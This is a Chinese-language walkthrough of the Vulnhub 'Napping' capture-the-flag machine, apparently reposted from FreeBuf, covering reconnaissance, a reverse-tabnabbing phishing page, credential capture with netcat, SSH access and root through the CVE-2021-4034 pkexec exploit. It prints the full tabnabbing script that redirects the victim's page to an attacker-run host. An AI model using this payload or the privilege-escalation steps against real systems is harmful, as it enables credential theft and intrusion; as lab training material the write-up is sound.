Vulnhub_Napping

主机信息
kali:192.168.3.76
napping:192.168.31.47
信息收集
使用Nmap探测目标主机发现开放22、80两个端口
nmap -A -p- 192.168.31.47
访问80端口发现是一个登录页和一个注册页
查看这两个网页的源码没有发现有价值的信息
尝试注册一个账户,登录后发现存在一个输入框
输入后会生成一个超链接点击会进行跳转
根据网页的描述,在输入一个网址之后,管理员会进行审核,且这种生成的URL容易存在tabnabbing攻击
漏洞利用
首先从真网站下载一个网页
wget http://192.168.31.47/index.php
然后再创建一个html文件,写入钓鱼网站的代码(文中该文件名为1.html)
<!DOCTYPE html>
<html>
<body>
<script>
if(window.opener) window.opener.parent.location.replace('http://192.168.31.76:8080/index.html');
if(window.opener != window) window.opener.parent.location.replace('http://192.168.31.76:8080/index.html');
</script>
</body>
</html>
然后在网页目录下使用python开启一个http服务,使用nc监听钓鱼网站中使用的端口,在正常网页中填写构造的URL提交后,等待2-3分钟左右,NC就会返回一个用户名和密码
使用这个密码登录web界面,发现密码错误
然后尝试ssh登录,发现可以登录成功
查看daniel用户的家目录没有发现有用的信息
然后查看adrian用户家目录下存在三个文件
第一个是判断网站是否正常启动,并打印时间
这个文件为query.py
脚本执行写入的log文件
查看user.txt发现没有权限
提权
查看系统版本分析该网站可能存在CVE-2021-4034 polkit的pkexec本地权限提升漏洞
然后查看gcc是否存在和版本号
将cve-2021-4034漏洞的poc下载到服务器后,使用gcc进行编译
查看编译后文件
执行编译文件获得root权限
查看flag
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐